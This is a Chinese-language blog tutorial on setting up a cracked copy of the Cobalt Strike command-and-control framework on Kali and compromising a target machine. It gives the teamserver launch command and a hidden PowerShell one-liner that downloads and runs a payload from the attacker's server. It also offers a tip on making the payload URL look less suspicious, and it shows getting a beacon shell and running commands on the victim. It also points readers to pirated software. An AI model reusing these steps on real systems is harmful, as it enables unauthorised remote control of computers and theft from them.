clobalt strike下载和使用

clobalt strike

首先要进行版本的下载。这里我选择的是4.5版本,原版本需要收费,这里直接下载的破解版

[内网渗透: Cobalt Strike 4.5全版本&破解源码] - 徐野子 - 博客园 (cnblogs.com)

把下载的文件拖到kali后,cd到文件运行命令,运行团队服务器。在这里,需要设置当前主机的IP地址和团队服务器的密码。输入如下命令启动teamserver。

sudo ./teamserver 192.168.18.131 kali

注意这里ip是自己kali的ip,后面的是密码(我这里是kali)

./cobaltstrike,可以打开开始界面

然后可以新建一个监听器,点击左上角后,再点击下面添加

image-20240409112759769

image-20240409113021649

 

然后就可以准备攻击模式

这里首先选择的是powershell

image-20240409113135584

image-20240409113203168

复制url后直接在目标机里访问这个url

比如我这里的是

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.18.131:80/a'))"

那我直接访问http://192.168.18.131:80/a ,这个url看着比较怪,如果想要更加自然可以在上一步路径进行修改

执行成功后可以看到一台机器上线(包含外网IP地址,内网IP地址、监听器、用户名、机器名、是否有特权、Beacon进程的PID、心跳时间等信息)

image-20240409114238644

当然也可以直接在命令行里执行(老机型比如win2019要等个几分钟....)

image-20240409114219680

然后就可以在日志里看到目标机已经进入控制

image-20240409113421411

右键进行交互对于进行shell 命令

比如最简单的shell whoami

image-20240409113518065

得到回答(Beacon的每次回连时间默认为60秒。)

beacon为CS内置监听器,也就是说,当我们在目标系统成功执行Payload以后,会弹回一个beacon的shell给CS。

image-20240409112057987

参考全网最全的Cobalt Strike使用教程系列-基础篇 - FreeBuf网络安全行业门户

posted @ 2024-04-11 15:14  liu111ttk  阅读(281)  评论(0)    收藏  举报